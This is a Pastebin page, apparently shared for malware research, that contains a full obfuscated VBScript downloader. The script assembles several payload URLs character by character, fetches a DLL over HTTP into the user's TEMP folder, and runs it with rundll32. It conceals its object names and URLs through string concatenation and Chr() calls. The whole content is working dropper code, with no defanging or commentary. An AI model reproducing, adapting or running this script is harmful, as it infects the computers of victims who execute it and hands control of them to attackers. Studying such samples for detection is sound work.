SHARE
TWEET

Malicious script

dynamoo Nov 7th, 2016 133 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Rv5h5i0k5p4 = 1, ECi1q9j5n6t2 = 2, Nl0r5e4i0g5 = 8
  3. Const Tf5d1h8l8w8 = 1, Jv0x6w7t6c3 = 2, QZf6c8u7l5f0 = "437", BXh8q2v4w5z5 = 2
  4. Function Bl4t5r0i1e9(Fv9e9y4c1g9)
  5. Dim Xt8o8f7y3d6, At9i4m5e3u5, Xw9n5b2r3s3
  6. Set Xt8o8f7y3d6 = CreateObject("ADO"&"DB.Stream")
  7. Xt8o8f7y3d6.type = Jv0x6w7t6c3
  8. Xt8o8f7y3d6.Charset = QZf6c8u7l5f0
  9. Xt8o8f7y3d6.Open
  10. Xt8o8f7y3d6.LoadFromFile Fv9e9y4c1g9
  11. Xw9n5b2r3s3 = Xt8o8f7y3d6.ReadText
  12. Xt8o8f7y3d6.Close
  13. Bl4t5r0i1e9 = RVu2q1z1c0a7(Xw9n5b2r3s3)
  14. End Function
  15. Sub Lh3s4l5l8e0(Fv9e9y4c1g9, Sk7x2y6a5a6)
  16. Dim Xt8o8f7y3d6, Xw9n5b2r3s3
  17. Set Xt8o8f7y3d6 = CreateObject("AD"&"ODB.Stream")
  18. Xt8o8f7y3d6.type = Jv0x6w7t6c3
  19. Xt8o8f7y3d6.Charset = QZf6c8u7l5f0
  20. Xt8o8f7y3d6.Open
  21. Xw9n5b2r3s3 = Mh3x8t2w7s4(Sk7x2y6a5a6)
  22. Xt8o8f7y3d6.WriteText Xw9n5b2r3s3
  23. Xt8o8f7y3d6.SaveToFile Fv9e9y4c1g9, BXh8q2v4w5z5
  24. Xt8o8f7y3d6.Close
  25. End Sub
  26. Function Gy2r4m8v9v6(Bn5k1c7z6z5)
  27. Dim Xw9n5b2r3s3, IKr9a2y0a5j9(0)
  28. If Bn5k1c7z6z5 <= 0 Then
  29. Err.Raise 50001, "", "qqqq", "", 0
  30. ElseIf Bn5k1c7z6z5 = 1 Then
  31. Gy2r4m8v9v6 = IKr9a2y0a5j9
  32. Else
  33. Xw9n5b2r3s3 = Space(Bn5k1c7z6z5-1)
  34. Gy2r4m8v9v6 = Split(Xw9n5b2r3s3, " ")
  35. End If
  36. End Function
  37. Function BCr1v0l5c8g5(Fk9j1v0p7l3)
  38. Dim Iz3v0l3j1a1, HUh0i1z9q7g4, At9i4m5e3u5, JWw7w5w3u6o8
  39. Dim YHp5y6z3v4q4, KUd3g8r1s6v2(1)
  40. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  41. KUd3g8r1s6v2(0) = "WinHttp.WinH"&"ttpRequest.5.1"
  42. KUd3g8r1s6v2(1) = "MSXML2.XML"&"HTTP"
  43. For Each YHp5y6z3v4q4 in KUd3g8r1s6v2
  44. Err.Clear
  45. Set HUh0i1z9q7g4 = CreateObject(YHp5y6z3v4q4)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. If 8=8 Then
  51. HUh0i1z9q7g4.Open "GE"&"T", Fk9j1v0p7l3, False
  52. End If
  53. HUh0i1z9q7g4.Send
  54. At9i4m5e3u5 = Gy2r4m8v9v6(LenB(HUh0i1z9q7g4.ResponseBody))
  55. For JWw7w5w3u6o8 = 1 To LenB(HUh0i1z9q7g4.ResponseBody)
  56. At9i4m5e3u5(JWw7w5w3u6o8-1) = AscB(MidB(HUh0i1z9q7g4.ResponseBody, JWw7w5w3u6o8, 1))
  57. Next
  58. BCr1v0l5c8g5 = At9i4m5e3u5
  59. End Function
  60. Sub Nz7k3t7g3a1( Cm7n0l9x9v5, FYc9e1v7b1e0 )
  61. Dim JWw7w5w3u6o8, IEi1c2a1a8u2, Iz3v0l3j1a1, HUh0i1z9q7g4, Kk0o3l9i3m1
  62. Set Iz3v0l3j1a1 = CreateObject( "Scrip"&"ting.FileSystemObject" )
  63. If Iz3v0l3j1a1.FolderExists( FYc9e1v7b1e0 ) Then
  64. Kk0o3l9i3m1 = Iz3v0l3j1a1.BuildPath( FYc9e1v7b1e0, Mid( Cm7n0l9x9v5, InStrRev( Cm7n0l9x9v5, "/" ) + 1 ) )
  65. ElseIf Iz3v0l3j1a1.FolderExists( Left( FYc9e1v7b1e0, InStrRev( FYc9e1v7b1e0, "\" ) - 1 ) ) Then
  66. Kk0o3l9i3m1 = FYc9e1v7b1e0
  67. Else
  68. Exit Sub
  69. End If
  70. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.OpenTextFile( Kk0o3l9i3m1, ECi1q9j5n6t2, True )
  71. Set HUh0i1z9q7g4 = CreateObject( "WinHttp.WinHttp"&"Request.5.1" )
  72. HUh0i1z9q7g4.Open "G"&"ET", Cm7n0l9x9v5, False
  73. HUh0i1z9q7g4.Send
  74. If LenB(HUh0i1z9q7g4.ResponseBody) < 100000 Or LenB(HUh0i1z9q7g4.ResponseBody) > 250000 Then
  75. Err.Raise 50011, "", "qqqq", "", 0
  76. Exit Sub
  77. End If
  78. For JWw7w5w3u6o8 = 1 To LenB( HUh0i1z9q7g4.ResponseBody )
  79. IEi1c2a1a8u2.Write Chr( AscB( MidB( HUh0i1z9q7g4.ResponseBody, JWw7w5w3u6o8, 1 ) ) )
  80. Next
  81. If 8=8 Then
  82. IEi1c2a1a8u2.Close( )
  83. End If
  84. End Sub
  85. Function Pv0a8n6g5v4()
  86. Dim EZf5v6c8r2a8, Jd3q5u3r2z0, FMw4p1c2u1x5
  87. Set EZf5v6c8r2a8 = CreateObject(Chr(87)+Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
  88. If 8=8 Then
  89. Set Jd3q5u3r2z0 = EZf5v6c8r2a8.Environment("System")
  90. End If
  91. FMw4p1c2u1x5 = Jd3q5u3r2z0("PROCESSOR_"&"ARCHITECTURE")
  92. If LCase(FMw4p1c2u1x5) = Chr(97) & "md6"& Chr(34) Then
  93. Pv0a8n6g5v4 = EZf5v6c8r2a8.ExpandEnvironmentStrings("%SystemRoot%\Sy"&"sWOW64\rundll32.e"&"xe")
  94. Else
  95. Pv0a8n6g5v4 = EZf5v6c8r2a8.ExpandEnvironmentStrings("%SystemRoot"&"%\system32\rundll32.e"&"xe")
  96. End If
  97. End Function
  98. Sub Xd4l3m8o1v8(Vh9n6b5o9t6, LAi2q6i0o9v5, Eq1t0n9v2y8)
  99. Dim EZf5v6c8r2a8, Iz3v0l3j1a1, IEi1c2a1a8u2, WKw2a7v0n6q7, WXm6i4u5t3c8
  100. Set EZf5v6c8r2a8 = CreateObject("WScr"&"ipt"&".S"&"hell")
  101. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  102. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.GetFile(Vh9n6b5o9t6)
  103. WKw2a7v0n6q7 = IEi1c2a1a8u2.ShortPath
  104. WXm6i4u5t3c8 = Pv0a8n6g5v4() + " " + WKw2a7v0n6q7 + "," + LAi2q6i0o9v5 + " " + Eq1t0n9v2y8
  105. If 8=8 Then
  106. EZf5v6c8r2a8.Run(WXm6i4u5t3c8)
  107. End If
  108. End Sub
  109. Function Ad4b1n4q7z5(Vh9n6b5o9t6)
  110. Dim Iz3v0l3j1a1
  111. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  112. Ad4b1n4q7z5 = Iz3v0l3j1a1.FileExists(Vh9n6b5o9t6)
  113. End Function
  114. Function Zx4v2w0r4u0(Vh9n6b5o9t6)
  115. Dim Iz3v0l3j1a1, IEi1c2a1a8u2
  116. Set Iz3v0l3j1a1 = CreateObject("Scrip"&"ting.FileSystemObject")
  117. Set IEi1c2a1a8u2 = Iz3v0l3j1a1.GetFile(Vh9n6b5o9t6)
  118. Zx4v2w0r4u0 = IEi1c2a1a8u2.ShortPath
  119. End Function
  120. Function Re8a1r0o6e1(Rq2b7l1n2y6, TZd1g6d1o3r2)
  121. Dim Bn5k1c7z6z5
  122. Bn5k1c7z6z5 = CDbl(Int(CDbl(Rq2b7l1n2y6)/CDbl(TZd1g6d1o3r2)))
  123. Re8a1r0o6e1 = CDbl(Rq2b7l1n2y6) - Bn5k1c7z6z5 * CDbl(TZd1g6d1o3r2)
  124. End Function
  125. Function Md2j7u6u1i0(Zz7v7s1x7d5, Xw9n5b2r3s3)
  126. Xw9n5b2r3s3(1) = 172 * Xw9n5b2r3s3(1) Mod 30307
  127. Xw9n5b2r3s3(0) = 171 * Xw9n5b2r3s3(0) Mod 30269
  128. Xw9n5b2r3s3(2) = 170 * Xw9n5b2r3s3(2) Mod 30323
  129. Dim Od5t0s3j9r6
  130. Od5t0s3j9r6 = Re8a1r0o6e1((CDbl(Xw9n5b2r3s3(0))/30269.0 + CDbl(Xw9n5b2r3s3(1))/30307.0 + CDbl(Xw9n5b2r3s3(2))/30323.0), 1.0)
  131. Md2j7u6u1i0 = Int(Od5t0s3j9r6 * CDbl(Zz7v7s1x7d5))
  132. End Function
  133. Function NHi6u0v5e9c1(SDs8s0h3q2t3)
  134. NHi6u0v5e9c1 = CInt(SDs8s0h3q2t3*Rnd())
  135. End Function
  136. Sub MRc3u4f8f1p5(Qe7z5e4c3o0)
  137. WScript.Sleep(Qe7z5e4c3o0)
  138. End Sub
  139. Sub TSa5t4w9r4j5(Nk9k2y9e6s1)
  140. WScript.Quit(Nk9k2y9e6s1)
  141. End Sub
  142. Randomize
  143. Dim DZe6j2w7j5r8(2), Qt5h4g3u5j2, ALo0k4j3l5o6(4), Fv9e9y4c1g9
  144. DZe6j2w7j5r8(0)=0+14413
  145. DZe6j2w7j5r8(1)=0+15337
  146. DZe6j2w7j5r8(2)=0+15163
  147. Qt5h4g3u5j2 = 1
  148. ALo0k4j3l5o6(0) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "c" & chR(111) & "a" & chR(99) & "h" & "a" & "t" & "e" & "l" & "i" & "e" & "r" & chR(46) & "n" & "l" & "/" & "l" & "g" & "8" & "s" & "2"
  149.  
  150. ALo0k4j3l5o6(1) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "b" & chR(101) & "c" & "h" & "s" & "a" & "u" & "t" & "o" & "m" & "o" & "b" & "i" & "l" & "e" & "r" & "." & chR(100) & "k" & chR(47) & "m" & chR(56) & "i" & "d" & "i" & "9" & "j"
  151.  
  152. ALo0k4j3l5o6(2) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "d" & "e" & "s" & "e" & "r" & "t" & "k" & chR(105) & "n" & "g" & "w" & "a" & "t" & "e" & "r" & chR(112) & "r" & "o" & "o" & "f" & "i" & chR(110) & "g" & "." & chR(99) & "o" & "m" & "/" & "m" & "a" & "4" & "5" & "6" & "2"
  153.  
  154. ALo0k4j3l5o6(3) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ chR(122) & "a" & "p" & "a" & "s" & "h" & "y" & "d" & "r" & "o" & "." & "n" & "e" & "t" & "/" & "6" & chR(115) & "g" & chR(116) & "o" & "2" & "b" & "d"
  155.  
  156. ALo0k4j3l5o6(4) = ""+"h"+Chr(116)+Chr(116)+"p:"+"/"+"/"+ "o" & "w" & "k" & "c" & "o" & "n" & "." & "c" & "o" & "m" & "/" & "6" & "x" & "g" & "o" & "h" & "g" & "6" & "i"
  157.  
  158. Fv9e9y4c1g9 = "Z6uBMrbyqhs"
  159. Dim EZf5v6c8r2a8, IVr6o1p3r6l7, VKq6s6r7i0o2, LZe1c7b8o0k2, Qe7z5e4c3o0, HFt4k4c2m5r4
  160. Set objShell = CreateObject("WS"&"cript.S"&"hell")
  161. IVr6o1p3r6l7 = objShell.ExpandEnvironmentStrings("%" & "T"&"EM"&"P%")
  162. HFt4k4c2m5r4 = "txt"
  163. Dim Jz3j8p0i0l9, PZy6t5m4r1m5, STk3e6y8i6d0, Nw0q9o9m6w1, JWw7w5w3u6o8
  164. PZy6t5m4r1m5 = False
  165. For JWw7w5w3u6o8=0 To 5
  166. VKq6s6r7i0o2 = IVr6o1p3r6l7 & "\" + Fv9e9y4c1g9 + Chr(48+JWw7w5w3u6o8) + "."+"d"&"l"+"l"
  167. If Ad4b1n4q7z5(VKq6s6r7i0o2) Then
  168. LZe1c7b8o0k2 = Zx4v2w0r4u0(VKq6s6r7i0o2) & "." + HFt4k4c2m5r4
  169. If Ad4b1n4q7z5(LZe1c7b8o0k2) Then
  170. WScript.Quit(0)
  171. End If
  172. End If
  173. If Not PZy6t5m4r1m5 Then
  174. Jz3j8p0i0l9 = NHi6u0v5e9c1(UBound(ALo0k4j3l5o6))
  175. Nz7k3t7g3a1 ALo0k4j3l5o6(Jz3j8p0i0l9), VKq6s6r7i0o2
  176. If Err.Number <> 0 Then
  177. WScript.Quit(0)
  178. End If
  179. PZy6t5m4r1m5 = True
  180. End If
  181. Xd4l3m8o1v8 VKq6s6r7i0o2, "bb"&"b", "41"&"7"
  182. TSa5t4w9r4j5 1
  183. Next
  184. If 8=8 Then
  185. TSa5t4w9r4j5 0
  186. End If
RAW Paste Data
Top